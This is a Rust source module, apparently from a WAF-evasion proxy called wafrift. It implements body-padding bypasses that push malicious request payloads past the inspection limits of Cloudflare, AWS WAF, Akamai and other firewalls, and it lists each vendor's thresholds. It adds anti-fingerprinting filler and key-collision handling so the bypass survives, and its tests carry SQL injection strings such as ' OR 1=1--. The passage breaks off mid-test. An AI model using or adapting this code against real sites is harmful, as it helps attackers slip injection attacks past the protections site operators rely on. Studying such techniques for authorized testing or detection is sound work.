Skip to main content

wafrift_evolution/
body_padding.rs

1//! Body-size inspection bypass.
2//!
3//! Cloud WAFs only inspect the leading N bytes of a request body:
4//! Cloudflare Pro 8 KB, Cloudflare Enterprise 128 KB, AWS WAF 8/16/64 KB
5//! depending on tier, Akamai 8 KB by default. If we prepend ≥ N bytes
6//! of inert junk in front of the real payload, the WAF rule engine
7//! never sees the malicious bytes — they're past its inspection window
8//! — and the origin still parses the body correctly.
9//!
10//! This module produces structurally-valid padded bodies for the four
11//! content-types we routinely inject into:
12//!
//! - `application/json` — a JSON object gets a leading junk field
//!   spliced in: `{"_wafrift_pad":"<N bytes>",<original fields>}`; any
//!   other root is wrapped:
//!   `{"_wafrift_pad":"<N bytes>","payload":<original>}`.
//! - `application/x-www-form-urlencoded` — prepend
//!   `_wafrift_pad=<N bytes>&` to the original body.
//! - `multipart/form-data` — prepend a junk part with the same
//!   boundary, before the real parts.
//! - `text/*` and `application/xml` — fall back to a
//!   `_wafrift_pad=<N bytes>` form-style body only if the body is
//!   empty; otherwise refuse and return the original. Any other
//!   content-type (binary, unknown) is always refused. Padding inside
//!   an opaque body would corrupt it; honesty over false-victory.
23//!
//! The junk is pseudo-random lowercase alphanumeric ASCII (`a`-`z`,
//! `0`-`9`). It carries no SQL, XSS, or shell metacharacters, so the
//! WAF won't flag the padding itself even if it does inspect a partial
//! slice.
27
28use std::collections::HashSet;
29
/// Marker name for the injected padding. It is used as the JSON key
/// (suffixed with `_<n>` when the body already carries that key), as
/// the form key, and as the multipart part name. Stable across calls
/// so a post-hoc test can verify the padding was applied.
pub const PAD_KEY: &str = "_wafrift_pad";

/// Smallest padding worth applying. Anything below this won't reliably
/// push a real payload past a WAF's inspection window, so `pad`
/// answers such requests with `PadOutcome::SkippedTooSmall`.
pub const MIN_USEFUL_PAD: usize = 4 * 1024;

/// Hard cap on padding size to prevent OOM from accidental
/// `requested_bytes = usize::MAX` (deliberate abuse or arithmetic
/// underflow upstream). 8 MiB is well above any documented cloud-WAF
/// inspection window (Cloudflare Enterprise tops out at 128 KiB).
/// `pad` clamps larger requests down to this value, and `pad_json`
/// refuses bodies that are themselves larger than this.
pub const MAX_USEFUL_PAD: usize = 8 * 1024 * 1024;
43
44/// Generate `n` bytes of inert ASCII filler.
45///
46/// Uses a deterministic xorshift PRNG over `[a-z0-9]` so the padding
47/// looks like normal junk parameter content. A run-of-A filler trips
48/// Naxsi's `BIG_REQUEST` heuristic and `ModSecurity`'s `RX` rules that
49/// flag long single-character sequences. Random-looking lowercase
50/// alphanumeric is the same alphabet wordlists use, so the WAF
51/// classifies it as boring.
52///
53/// Within a single process every call with the same `n` returns the
54/// same bytes (tests + reproducibility), but ACROSS processes the
55/// output differs: at first call we OsRng-seed a process nonce,
56/// then mix it into the per-call state seed. Pre-fix every wafrift
57/// invocation worldwide produced the EXACT same 8 KiB padding for
58/// `n = 8192` — a WAF vendor that captured one padded request could
59/// write a regex matching the verbatim prefix and block every
60/// future wafrift probe collectively. The per-process nonce
61/// scatters that fingerprint without breaking within-process
62/// determinism.
63fn fill(n: usize) -> Vec<u8> {
64    fill_with_seed(n, process_nonce())
65}
66
/// Deterministically generate `n` filler bytes drawn from `[a-z0-9]`.
///
/// The generator is a plain xorshift64 (shift triple 13/7/17) whose
/// initial state is a fixed constant mixed with `n` and `extra_seed`,
/// so identical `(n, extra_seed)` pairs always yield identical bytes
/// and different pairs yield different streams.
///
/// Returns an empty vector when `n == 0`.
fn fill_with_seed(n: usize, extra_seed: u64) -> Vec<u8> {
    const ALPHABET: &[u8] = b"abcdefghijklmnopqrstuvwxyz0123456789";
    // Reduce the state in the u64 domain. Casting the state to `usize`
    // first would truncate it on 32-bit targets and make the output
    // depend on pointer width.
    const ALPHABET_LEN: u64 = ALPHABET.len() as u64;

    let mut state: u64 = 0x9E37_79B9_7F4A_7C15u64
        .wrapping_add(n as u64)
        .wrapping_add(extra_seed)
        .wrapping_mul(0xBF58_476D_1CE4_E5B9);
    if state == 0 {
        // Zero is the xorshift fixed point (it would emit 'a' forever);
        // bump to an arbitrary non-zero seed.
        state = 0xDEAD_BEEF_CAFE_F00D;
    }

    let mut out = Vec::with_capacity(n);
    out.extend((0..n).map(|_| {
        state ^= state << 13;
        state ^= state >> 7;
        state ^= state << 17;
        // The remainder is < 36, so the narrowing cast is lossless.
        ALPHABET[(state % ALPHABET_LEN) as usize]
    }));
    out
}
87
88/// Process-lifetime padding nonce — OsRng-seeded at first use.
89/// Returns 0 in test builds so the existing test fixtures (which
90/// assert exact bytes) keep passing AND so cross-process variation
91/// only kicks in for real binaries.
92fn process_nonce() -> u64 {
93    #[cfg(test)]
94    {
95        0
96    }
97    #[cfg(not(test))]
98    {
99        use std::sync::OnceLock;
100        static NONCE: OnceLock<u64> = OnceLock::new();
101        *NONCE.get_or_init(|| {
102            use rand::RngCore;
103            let mut rng = rand::rngs::OsRng;
104            rng.next_u64()
105        })
106    }
107}
108
/// Result of a padding attempt.
///
/// Only the `Padded` variant carries a body; for both `Skipped*`
/// variants the caller keeps using the body it passed in.
#[derive(Debug, Clone, PartialEq, Eq)]
pub enum PadOutcome {
    /// Body was padded successfully. `bytes` holds the new body.
    /// `added` is the growth reported by the padding routine; it is
    /// never smaller than the effective padding size, i.e. the
    /// requested size after clamping to `MAX_USEFUL_PAD`.
    Padded { bytes: Vec<u8>, added: usize },
    /// The body could not be padded without corrupting it: the
    /// content-type was opaque (binary, unknown) or non-empty text/XML,
    /// a multipart body had no usable boundary or did not start with
    /// it, or a JSON body was oversized or not UTF-8. Original returned
    /// unchanged.
    SkippedOpaque,
    /// The requested padding is below `MIN_USEFUL_PAD`; not worth doing.
    SkippedTooSmall,
}
122
123/// Pad `body` with at least `requested_bytes` of inert filler, choosing
124/// a structure-preserving strategy based on `content_type`.
125///
126/// If `requested_bytes < MIN_USEFUL_PAD`, returns
127/// [`PadOutcome::SkippedTooSmall`].
128///
129/// `content_type` matching is case-insensitive on the type/subtype and
130/// ignores parameters (`charset=utf-8`, `boundary=...`, …) — except for
131/// `multipart/form-data`, where the `boundary=` parameter is required
132/// to splice in the junk part.
133pub fn pad(body: &[u8], content_type: &str, requested_bytes: usize) -> PadOutcome {
134    if requested_bytes < MIN_USEFUL_PAD {
135        return PadOutcome::SkippedTooSmall;
136    }
137    // Clamp pathological values silently rather than allocating GBs.
138    // 8 MiB is more than any real WAF inspects; anything beyond is
139    // either a bug or abuse.
140    let requested_bytes = requested_bytes.min(MAX_USEFUL_PAD);
141
142    let ct_lower = content_type.to_ascii_lowercase();
143    let main_type = ct_lower.split(';').next().unwrap_or("").trim().to_string();
144
145    if main_type == "application/json" || main_type.ends_with("+json") {
146        return pad_json(body, requested_bytes);
147    }
148    if main_type == "application/x-www-form-urlencoded" {
149        return pad_form(body, requested_bytes);
150    }
151    if main_type == "multipart/form-data" {
152        // Boundary VALUES are case-sensitive (RFC 2046 §5.1.1) — extract
153        // from the original `content_type`, not the lowercased copy.
154        // Only the `boundary=` parameter NAME is case-insensitive.
155        if let Some(boundary) = extract_boundary(content_type) {
156            return pad_multipart(body, &boundary, requested_bytes);
157        }
158        // Multipart without a boundary param — body is already
159        // malformed; don't compound the problem.
160        return PadOutcome::SkippedOpaque;
161    }
162    if main_type.starts_with("text/") || main_type == "application/xml" {
163        // For arbitrary text/xml we don't have a safe place to inject
164        // padding without breaking the document. If empty, attach a
165        // form-style prefix so a downstream form parser has padding to
166        // chew on; otherwise hand back the original.
167        if body.is_empty() {
168            return pad_form(body, requested_bytes);
169        }
170        return PadOutcome::SkippedOpaque;
171    }
172
173    PadOutcome::SkippedOpaque
174}
175
176fn pad_json(body: &[u8], requested_bytes: usize) -> PadOutcome {
177    // Hard guard: a body larger than MAX_USEFUL_PAD is never useful
178    // to feed through serde_json::from_slice OR through the
179    // "treat as opaque text and embed as a string" fallback below —
180    // both paths would allocate at least body.len() bytes a second
181    // time. Skip-and-pass-through is correct: cloud-WAF inspection
182    // bypasses target SMALL bodies (the WAF inspects the first 8KB or
183    // 16KB), so padding only matters under the cap. Adversarial
184    // multi-MB bodies are an OOM vector, not a bypass surface.
185    if body.len() > MAX_USEFUL_PAD {
186        return PadOutcome::SkippedOpaque;
187    }
188    let pad = fill(requested_bytes);
189    // Two shapes:
190    // 1. body is empty or not valid JSON → emit `{"_wafrift_pad":"…"}`
191    //    with the request as a string field if non-empty.
192    // 2. body parses as JSON object → splice in the pad as the first
193    //    field, preserving the object's other contents verbatim.
194    // 3. body parses as a top-level array/scalar → wrap:
195    //    `{"_wafrift_pad":"…","payload":<original>}`.
196    //
197    // The wrapping in case 3 changes the JSON shape. That's OK for a
198    // proxy that's evading a WAF — the origin sees a top-level object
199    // with the original payload nested under `payload`, which most
200    // permissive APIs ignore as an unknown extra field. If your origin
201    // requires a non-object JSON root, prefer form/multipart.
202    let pad_str = String::from_utf8(pad).expect("fill produces ASCII-only bytes");
203    if body.is_empty() {
204        let new_body = format!("{{\"{PAD_KEY}\":\"{pad_str}\"}}").into_bytes();
205        return PadOutcome::Padded {
206            bytes: new_body,
207            added: requested_bytes,
208        };
209    }
210    if let Ok(s) = std::str::from_utf8(body)
211        && let Ok(serde_json::Value::Object(map)) = serde_json::from_str::<serde_json::Value>(s)
212    {
213        // Splice _wafrift_pad as first key. serde_json::Map is
214        // insertion-ordered when the `preserve_order` feature is
215        // on. We don't have that feature, so build a fresh object
216        // by serializing the pad first then concatenating.
217        //
218        // Simpler: emit `{"_wafrift_pad":"…",<rest of original
219        // object minus the leading `{`>`. This preserves byte
220        // order of the user's data exactly.
221        // Find the first `{`.
222        if let Some(open) = s.find('{') {
223            // Collision guard: the user-controlled body may
224            // already carry our PAD_KEY. JSON objects with
225            // duplicate keys aren't strictly forbidden by RFC 8259
226            // §4 but most parsers keep the LAST one — our injected
227            // pad would be silently dropped at the origin and the
228            // WAF bypass is lost. Worse, an attacker who knows
229            // wafrift is in front could pre-set _wafrift_pad to a
230            // huge value to probe the padding strategy. Pick a
231            // collision-free key by suffixing with a counter.
232            let pad_key: String = if map.contains_key(PAD_KEY) {
233                let mut suffix = 1u32;
234                loop {
235                    let candidate = format!("{PAD_KEY}_{suffix}");
236                    if !map.contains_key(&candidate) {
237                        break candidate;
238                    }
239                    suffix += 1;
240                    // Defensive: ~4B unique keys is plenty; if
241                    // somehow exhausted, fall back to the
242                    // collision'd key (the bypass attempt still
243                    // produces a parseable JSON, just with a
244                    // duplicate-key body).
245                    if suffix == u32::MAX {
246                        break PAD_KEY.to_string();
247                    }
248                }
249            } else {
250                PAD_KEY.to_string()
251            };
252            let after = &s[open + 1..];
253            // If the original is `{}`, after = "}". That's fine.
254            // If after starts with `}` we don't want a stray comma.
255            let glue = if after.trim_start().starts_with('}') {
256                ""
257            } else {
258                ","
259            };
260            let new_body = format!("{{\"{pad_key}\":\"{pad_str}\"{glue}{after}").into_bytes();
261            let added = new_body.len().saturating_sub(body.len());
262            return PadOutcome::Padded {
263                bytes: new_body,
264                added,
265            };
266        }
267    }
268    // Non-object JSON (array/string/number) or malformed — wrap.
269    let Ok(original) = std::str::from_utf8(body) else {
270        return PadOutcome::SkippedOpaque;
271    };
272    // If the original was valid JSON but not an object, wrap with `payload`.
273    // Reject absurdly large bodies before parsing to prevent OOM.
274    let wrapped = if body.len() <= MAX_USEFUL_PAD
275        && serde_json::from_slice::<serde_json::Value>(body).is_ok()
276    {
277        format!("{{\"{PAD_KEY}\":\"{pad_str}\",\"payload\":{original}}}")
278    } else {
279        // Treat original as opaque text and embed as a string.
280        let escaped = serde_json::to_string(&original).unwrap_or_else(|_| "\"\"".into());
281        format!("{{\"{PAD_KEY}\":\"{pad_str}\",\"payload\":{escaped}}}")
282    };
283    let new_body = wrapped.into_bytes();
284    let added = new_body.len().saturating_sub(body.len());
285    PadOutcome::Padded {
286        bytes: new_body,
287        added,
288    }
289}
290
291fn pad_form(body: &[u8], requested_bytes: usize) -> PadOutcome {
292    let pad = fill(requested_bytes);
293    let pad_str = String::from_utf8(pad).expect("fill produces ASCII-only bytes");
294    let new_body = if body.is_empty() {
295        format!("{PAD_KEY}={pad_str}").into_bytes()
296    } else {
297        let mut out = Vec::with_capacity(body.len() + requested_bytes + 32);
298        out.extend_from_slice(format!("{PAD_KEY}={pad_str}&").as_bytes());
299        out.extend_from_slice(body);
300        out
301    };
302    let added = new_body.len().saturating_sub(body.len());
303    PadOutcome::Padded {
304        bytes: new_body,
305        added,
306    }
307}
308
309fn pad_multipart(body: &[u8], boundary: &str, requested_bytes: usize) -> PadOutcome {
310    // Build a fresh leading part using the existing boundary. The
311    // assembled part begins with `--<boundary>\r\n<headers>\r\n\r\n<pad>\r\n`.
312    // The original body already contains its own leading `--<boundary>`,
313    // so we splice ours in front and let the original's first line
314    // continue as the second part's separator.
315    //
316    // If the body doesn't start with `--<boundary>` it's malformed —
317    // skip rather than corrupt further.
318    let prefix = format!("--{boundary}");
319    let body_str = std::str::from_utf8(body).unwrap_or("");
320    if !body.is_empty() && !body_str.starts_with(&prefix) {
321        return PadOutcome::SkippedOpaque;
322    }
323    let pad = fill(requested_bytes);
324    let mut leading = Vec::with_capacity(requested_bytes + boundary.len() + 128);
325    leading.extend_from_slice(format!("--{boundary}\r\n").as_bytes());
326    leading.extend_from_slice(
327        format!("Content-Disposition: form-data; name=\"{PAD_KEY}\"\r\n").as_bytes(),
328    );
329    leading.extend_from_slice(b"\r\n");
330    leading.extend_from_slice(&pad);
331    leading.extend_from_slice(b"\r\n");
332    let mut new_body = Vec::with_capacity(leading.len() + body.len());
333    new_body.extend_from_slice(&leading);
334    new_body.extend_from_slice(body);
335    let added = new_body.len().saturating_sub(body.len());
336    PadOutcome::Padded {
337        bytes: new_body,
338        added,
339    }
340}
341
/// Pull the `boundary` parameter value out of a Content-Type header.
///
/// The parameter NAME is matched case-insensitively (`boundary=`,
/// `Boundary=`, `BOUNDARY=`, …) while the VALUE keeps its original
/// casing, because boundary values are case-sensitive. Surrounding
/// double quotes and whitespace are stripped. Parameters whose value is
/// empty are skipped, and `None` is returned when no usable boundary
/// is present.
fn extract_boundary(content_type: &str) -> Option<String> {
    const NAME: &str = "boundary=";

    content_type.split(';').find_map(|param| {
        let param = param.trim();
        // `get` instead of slicing: the header is attacker-controlled
        // and a multibyte character straddling the split point must
        // yield "no match", not a panic.
        let name = param.get(..NAME.len())?;
        if !name.eq_ignore_ascii_case(NAME) {
            return None;
        }
        let value = param.get(NAME.len()..)?.trim_matches('"').trim();
        if value.is_empty() {
            None
        } else {
            Some(value.to_string())
        }
    })
}
373
374/// Reverse-check: does `body` look like it carries a wafrift-padded
375/// prefix? Used in tests + diagnostic logging.
376#[must_use]
377pub fn looks_padded(body: &[u8]) -> bool {
378    let needle = format!("\"{PAD_KEY}\"").into_bytes();
379    let needle_form = format!("{PAD_KEY}=").into_bytes();
380    let needle_mp = format!("name=\"{PAD_KEY}\"").into_bytes();
381    [needle, needle_form, needle_mp]
382        .iter()
383        .any(|n| memchr_subslice(body, n))
384}
385
/// Report whether `needle` occurs as a contiguous run inside
/// `haystack`. An empty needle, or one longer than the haystack, never
/// matches.
fn memchr_subslice(haystack: &[u8], needle: &[u8]) -> bool {
    match needle.len() {
        0 => false,
        len if len > haystack.len() => false,
        len => haystack.windows(len).any(|window| window == needle),
    }
}
392
/// Well-known WAF inspection thresholds as `(label, bytes)` pairs, in a
/// fixed order. Useful for callers picking a sane `requested_bytes`
/// default.
#[must_use]
pub fn known_thresholds() -> Vec<(&'static str, usize)> {
    const KIB: usize = 1024;
    const TABLE: [(&str, usize); 11] = [
        ("cloudflare-free", 128 * KIB),
        ("cloudflare-pro", 8 * KIB),
        ("cloudflare-business", 8 * KIB),
        ("cloudflare-enterprise", 128 * KIB),
        ("aws-waf-default", 8 * KIB),
        ("aws-waf-classic", 8 * KIB),
        ("aws-waf-extended", 64 * KIB),
        ("akamai-default", 8 * KIB),
        ("imperva-default", 128 * KIB),
        ("modsecurity-default", 128 * KIB),
        ("naxsi-default", 65 * KIB),
    ];
    TABLE.to_vec()
}
411
412/// Set of all numeric thresholds used by [`known_thresholds`], for
413/// `clap` value-validation in the proxy.
414#[must_use]
415pub fn known_threshold_values() -> HashSet<usize> {
416    known_thresholds().into_iter().map(|(_, v)| v).collect()
417}
418
419#[cfg(test)]
420mod tests {
421    use super::*;
422
423    #[test]
424    fn fill_is_deterministic_and_inert() {
425        let v = fill(8 * 1024);
426        assert_eq!(v.len(), 8 * 1024);
427        // Lowercase alphanumeric only — no SQL/XSS/shell metacharacters.
428        for &b in &v {
429            assert!(
430                (b.is_ascii_lowercase() || b.is_ascii_digit()),
431                "byte {b:#x} ({}) outside [a-z0-9]",
432                b as char
433            );
434        }
435        // Determinism: same n → same bytes.
436        assert_eq!(fill(8 * 1024), v);
437    }
438
439    #[test]
440    fn fill_no_long_runs() {
441        // The whole point of switching from 'A'*N to xorshift is that
442        // RX-based WAFs (naxsi BIG_REQUEST, modsec REQUEST_BODY runs)
443        // flag long single-character sequences. Verify no run of the
444        // same byte exceeds 6 (a defensive ceiling — true xorshift
445        // sometimes produces short repeats but never long ones).
446        let v = fill(64 * 1024);
447        let mut max_run = 1usize;
448        let mut cur_run = 1usize;
449        for w in v.windows(2) {
450            if w[0] == w[1] {
451                cur_run += 1;
452                max_run = max_run.max(cur_run);
453            } else {
454                cur_run = 1;
455            }
456        }
457        assert!(
458            max_run <= 6,
459            "filler has a run of {max_run} same bytes — would trigger WAF run-detection"
460        );
461    }
462
463    #[test]
464    fn pathological_size_clamps_to_max() {
465        // requested_bytes = usize::MAX should NOT OOM; it should
466        // silently clamp to MAX_USEFUL_PAD (8 MiB).
467        let out = pad(b"id=42", "application/x-www-form-urlencoded", usize::MAX);
468        let PadOutcome::Padded { bytes, .. } = out else {
469            panic!("expected Padded, got {out:?}");
470        };
471        // 8 MiB plus the ~20-byte original; well under usize::MAX.
472        assert!(bytes.len() <= MAX_USEFUL_PAD + 64);
473        assert!(bytes.len() >= MAX_USEFUL_PAD);
474    }
475
476    #[test]
477    fn malformed_content_type_is_safe() {
478        // Garbage Content-Type strings must not panic.
479        for ct in &[
480            "",
481            "////",
482            ";;;;",
483            "application/json;;;boundary=",
484            "\x00\x01\x02",
485        ] {
486            // Should produce SOME PadOutcome, never panic.
487            let _ = pad(b"id=42", ct, 8 * 1024);
488        }
489    }
490
491    #[test]
492    fn empty_input_with_huge_size() {
493        // Empty body + very large pad (but not pathological) — must
494        // still produce structurally-valid output.
495        let out = pad(b"", "application/json", 1024 * 1024);
496        let PadOutcome::Padded { bytes, .. } = out else {
497            panic!()
498        };
499        // Must parse as valid JSON.
500        let _: serde_json::Value = serde_json::from_slice(&bytes).expect("valid json");
501    }
502
503    #[test]
504    fn fill_distinct_per_size() {
505        // Different requested sizes produce different bytes (the seed
506        // includes n) so two adjacent buffers don't share a prefix
507        // a WAF could fingerprint.
508        let a = fill(8 * 1024);
509        let b = fill(8 * 1024 + 1);
510        assert_ne!(&a[..32], &b[..32]);
511    }
512
513    #[test]
514    fn skip_too_small() {
515        assert_eq!(
516            pad(b"x", "application/json", 100),
517            PadOutcome::SkippedTooSmall
518        );
519    }
520
521    #[test]
522    fn json_object_preserves_payload() {
523        let body = br#"{"q":"' OR 1=1--"}"#;
524        let out = pad(body, "application/json", 8 * 1024);
525        let PadOutcome::Padded { bytes, added } = out else {
526            panic!("expected padded, got {out:?}");
527        };
528        assert!(added >= 8 * 1024, "added={added}");
529        // Round-trips through serde — structurally valid JSON.
530        let v: serde_json::Value = serde_json::from_slice(&bytes).expect("valid json");
531        assert_eq!(v["_wafrift_pad"].as_str().map(str::len), Some(8 * 1024));
532        assert_eq!(v["q"].as_str(), Some("' OR 1=1--"));
533        assert!(looks_padded(&bytes));
534    }
535
536    #[test]
537    fn json_empty_body_emits_object() {
538        let out = pad(b"", "application/json", 8 * 1024);
539        let PadOutcome::Padded { bytes, .. } = out else {
540            panic!()
541        };
542        let v: serde_json::Value = serde_json::from_slice(&bytes).expect("valid json");
543        assert!(v.is_object());
544        assert!(v["_wafrift_pad"].is_string());
545    }
546
547    #[test]
548    fn json_array_root_wrapped_with_payload() {
549        let out = pad(br#"["x","y"]"#, "application/json", 8 * 1024);
550        let PadOutcome::Padded { bytes, .. } = out else {
551            panic!()
552        };
553        let v: serde_json::Value = serde_json::from_slice(&bytes).expect("valid json");
554        assert!(v["_wafrift_pad"].is_string());
555        assert!(v["payload"].is_array());
556        assert_eq!(v["payload"][0].as_str(), Some("x"));
557    }
558
559    #[test]
560    fn json_with_charset_param() {
561        let out = pad(br#"{"a":1}"#, "application/json; charset=utf-8", 8 * 1024);
562        assert!(matches!(out, PadOutcome::Padded { .. }));
563    }
564
565    #[test]
566    fn json_plus_suffix() {
567        let out = pad(br#"{"a":1}"#, "application/vnd.foo+json", 8 * 1024);
568        assert!(matches!(out, PadOutcome::Padded { .. }));
569    }
570
571    #[test]
572    fn form_prepends_padding_then_original() {
573        let body = b"username=admin&password=' OR 1=1--";
574        let out = pad(body, "application/x-www-form-urlencoded", 16 * 1024);
575        let PadOutcome::Padded { bytes, added } = out else {
576            panic!()
577        };
578        assert!(added >= 16 * 1024, "added={added}");
579        assert!(bytes.starts_with(b"_wafrift_pad="));
580        // The original payload is still in there, unmodified.
581        assert!(memchr_subslice(&bytes, body));
582    }
583
584    #[test]
585    fn multipart_splices_in_leading_part() {
586        let boundary = "----WebKitFormBoundary123";
587        let body = format!(
588            "--{boundary}\r\n\
589             Content-Disposition: form-data; name=\"q\"\r\n\
590             \r\n' OR 1=1--\r\n\
591             --{boundary}--\r\n"
592        );
593        let ct = format!("multipart/form-data; boundary={boundary}");
594        let out = pad(body.as_bytes(), &ct, 16 * 1024);
595        let PadOutcome::Padded { bytes, .. } = out else {
596            panic!()
597        };
598        let s = std::str::from_utf8(&bytes).unwrap();
599        // First boundary line opens the wafrift_pad part.
600        assert!(s.starts_with(&format!("--{boundary}\r\n")));
601        assert!(s.contains("name=\"_wafrift_pad\""));
602        // Original payload still intact further down.
603        assert!(s.contains("' OR 1=1--"));
604        // Original boundary appears at least twice (our part + the
605        // user's first part + closer).
606        let boundary_count = s.matches(&format!("--{boundary}")).count();
607        assert!(boundary_count >= 3, "boundary_count={boundary_count}");
608    }
609
610    #[test]
611    fn multipart_without_boundary_skipped() {
612        let out = pad(b"some body", "multipart/form-data", 16 * 1024);
613        assert_eq!(out, PadOutcome::SkippedOpaque);
614    }
615
616    #[test]
617    fn multipart_with_quoted_boundary() {
618        let boundary = "abc123";
619        let body = format!("--{boundary}\r\n\r\n--{boundary}--\r\n");
620        let out = pad(
621            body.as_bytes(),
622            &format!("multipart/form-data; boundary=\"{boundary}\""),
623            16 * 1024,
624        );
625        assert!(matches!(out, PadOutcome::Padded { .. }));
626    }
627
628    #[test]
629    fn opaque_binary_skipped() {
630        let body = b"\x89PNG\r\n\x1a\n\x00\x00";
631        let out = pad(body, "image/png", 16 * 1024);
632        assert_eq!(out, PadOutcome::SkippedOpaque);
633    }
634
635    #[test]
636    fn known_thresholds_includes_aws_and_cloudflare() {
637        let names: Vec<_> = known_thresholds().iter().map(|(n, _)| *n).collect();
638        assert!(names.iter().any(|n| n.starts_with("cloudflare")));
639        assert!(names.iter().any(|n| n.starts_with("aws-waf")));
640    }
641
642    #[test]
643    fn looks_padded_detects_each_shape() {
644        let json = pad(b"{}", "application/json", 8 * 1024);
645        let form = pad(b"", "application/x-www-form-urlencoded", 8 * 1024);
646        if let PadOutcome::Padded { bytes, .. } = json {
647            assert!(looks_padded(&bytes));
648        }
649        if let PadOutcome::Padded { bytes, .. } = form {
650            assert!(looks_padded(&bytes));
651        }
652        assert!(!looks_padded(b"plain old body"));
653    }
654
655    #[test]
656    fn oversized_json_body_does_not_oom() {
657        // A JSON array body larger than MAX_USEFUL_PAD should be skipped
658        // rather than fed to serde_json::from_slice and OOMing.
659        let huge = "x".repeat(MAX_USEFUL_PAD + 1024);
660        let body = format!("[{huge}]");
661        let out = pad(body.as_bytes(), "application/json", 8 * 1024);
662        // Should skip (not panic, not OOM)
663        assert!(
664            matches!(out, PadOutcome::SkippedOpaque | PadOutcome::SkippedTooSmall),
665            "oversized JSON body should be skipped, got {out:?}"
666        );
667    }
668
669    #[test]
670    fn json_body_with_existing_pad_key_does_not_collide() {
671        // Regression for the empty-`if` collision-detection branch:
672        // pre-fix the JSON arm noticed the existing PAD_KEY but did
673        // nothing about it, so the output had two `_wafrift_pad`
674        // keys. Most parsers keep the LAST key — our padding got
675        // dropped at the origin and the bypass was lost.
676        // Post-fix the injected key suffixes (_wafrift_pad_1) so
677        // both survive parsing.
678        let body = format!(r#"{{"{PAD_KEY}":"attacker-controlled","payload":"x"}}"#);
679        let out = pad(body.as_bytes(), "application/json", 8 * 1024);
680        let bytes = match out {
681            PadOutcome::Padded { bytes, .. } => bytes,
682            other => panic!("expected Padded, got {other:?}"),
683        };
684        let s = std::str::from_utf8(&bytes).unwrap();
685        // Parse to verify both keys survive distinctly.
686        let parsed: serde_json::Map<String, serde_json::Value> = serde_json::from_str(s).unwrap();
687        assert!(
688            parsed.contains_key(PAD_KEY),
689            "original PAD_KEY must survive: {s}"
690        );
691        // The injected key is _wafrift_pad_1 (or higher suffix).
692        let injected_key_count = parsed
693            .keys()
694            .filter(|k| k.starts_with(PAD_KEY) && k.as_str() != PAD_KEY)
695            .count();
696        assert!(
697            injected_key_count >= 1,
698            "must inject a non-colliding pad key: {s}"
699        );
700        // Original payload intact.
701        assert_eq!(parsed.get("payload").and_then(|v| v.as_str()), Some("x"));
702        // Original attacker-controlled value intact.
703        assert_eq!(
704            parsed.get(PAD_KEY).and_then(|v| v.as_str()),
705            Some("attacker-controlled")
706        );
707    }
708
709    #[test]
710    fn fill_with_seed_varies_across_seeds() {
711        // The per-process nonce mixing means cross-process output
712        // differs. Lock the contract on fill_with_seed: distinct
713        // extra_seed → distinct output (within the alphabet bias).
714        let a = fill_with_seed(256, 0xAAAA_AAAA);
715        let b = fill_with_seed(256, 0xBBBB_BBBB);
716        assert_ne!(a, b, "different seeds must produce different output");
717        // Same-seed determinism preserved.
718        assert_eq!(a, fill_with_seed(256, 0xAAAA_AAAA));
719    }
720
721    // ── fill(0): zero-length fill ─────────────────────────────────────────
722
723    #[test]
724    fn fill_zero_returns_empty() {
725        let v = fill(0);
726        assert!(v.is_empty(), "fill(0) must return empty vec");
727    }
728
729    #[test]
730    fn fill_with_seed_zero_n_returns_empty() {
731        let v = fill_with_seed(0, 0xDEAD);
732        assert!(v.is_empty());
733    }
734
735    // ── text/xml: non-empty body → SkippedOpaque ─────────────────────────
736
737    #[test]
738    fn text_xml_nonempty_body_returns_skipped_opaque() {
739        let xml_body = b"<?xml version=\"1.0\"?><root><elem>value</elem></root>";
740        let out = pad(xml_body, "text/xml", 8 * 1024);
741        assert_eq!(
742            out,
743            PadOutcome::SkippedOpaque,
744            "non-empty text/xml body must not be padded — would corrupt XML structure"
745        );
746    }
747
748    #[test]
749    fn application_xml_nonempty_body_returns_skipped_opaque() {
750        let xml_body = b"<Envelope><Body><req/></Body></Envelope>";
751        let out = pad(xml_body, "application/xml", 8 * 1024);
752        assert_eq!(
753            out,
754            PadOutcome::SkippedOpaque,
755            "non-empty application/xml body must be SkippedOpaque"
756        );
757    }
758
759    // ── text/xml: empty body → pad_form applied ───────────────────────────
760
761    #[test]
762    fn text_xml_empty_body_applies_form_padding() {
763        // Empty text/xml body: the pad() function calls pad_form(b"", …)
764        // which produces _wafrift_pad=<filler>.
765        let out = pad(b"", "text/xml", 8 * 1024);
766        let PadOutcome::Padded { bytes, added } = out else {
767            panic!("empty text/xml must produce Padded, got {out:?}");
768        };
769        assert!(added >= 8 * 1024, "added={added}");
770        assert!(
771            bytes.starts_with(b"_wafrift_pad="),
772            "empty text/xml padding must use form-key prefix"
773        );
774    }
775
776    #[test]
777    fn application_xml_empty_body_applies_form_padding() {
778        let out = pad(b"", "application/xml", 8 * 1024);
779        assert!(
780            matches!(out, PadOutcome::Padded { .. }),
781            "empty application/xml must produce Padded"
782        );
783    }
784
785    // ── text/plain non-empty → SkippedOpaque ─────────────────────────────
786
787    #[test]
788    fn text_plain_nonempty_body_returns_skipped_opaque() {
789        let out = pad(b"hello world", "text/plain", 8 * 1024);
790        assert_eq!(out, PadOutcome::SkippedOpaque);
791    }
792
793    // ── known_threshold_values() correctness ─────────────────────────────
794
795    #[test]
796    fn known_threshold_values_contains_expected_numbers() {
797        let values = known_threshold_values();
798        // Pin the documented WAF thresholds.
799        assert!(
800            values.contains(&(8 * 1024)),
801            "must include 8 KiB (cloudflare-pro / aws-waf)"
802        );
803        assert!(
804            values.contains(&(64 * 1024)),
805            "must include 64 KiB (aws-waf-extended)"
806        );
807        assert!(
808            values.contains(&(128 * 1024)),
809            "must include 128 KiB (cloudflare-enterprise / imperva / modsecurity)"
810        );
811        assert!(
812            values.contains(&(65 * 1024)),
813            "must include 65 KiB (naxsi-default)"
814        );
815    }
816
817    #[test]
818    fn known_threshold_values_matches_known_thresholds() {
819        let from_pairs: std::collections::HashSet<usize> =
820            known_thresholds().into_iter().map(|(_, v)| v).collect();
821        let from_fn = known_threshold_values();
822        assert_eq!(
823            from_pairs, from_fn,
824            "known_threshold_values() must match the values from known_thresholds()"
825        );
826    }
827
828    // ── extract_boundary: multibyte character safety ──────────────────────
829
830    #[test]
831    fn extract_boundary_multibyte_at_byte_9_does_not_panic() {
832        // A multibyte UTF-8 character (e.g. ≡ = 3 bytes: 0xE2, 0x89, 0xA1) that
833        // straddles byte position 9 would panic under p[..9] (now uses p.get(..9)).
834        // The Content-Type param looks like: "boundary≡abc" where ≡ starts at byte 8.
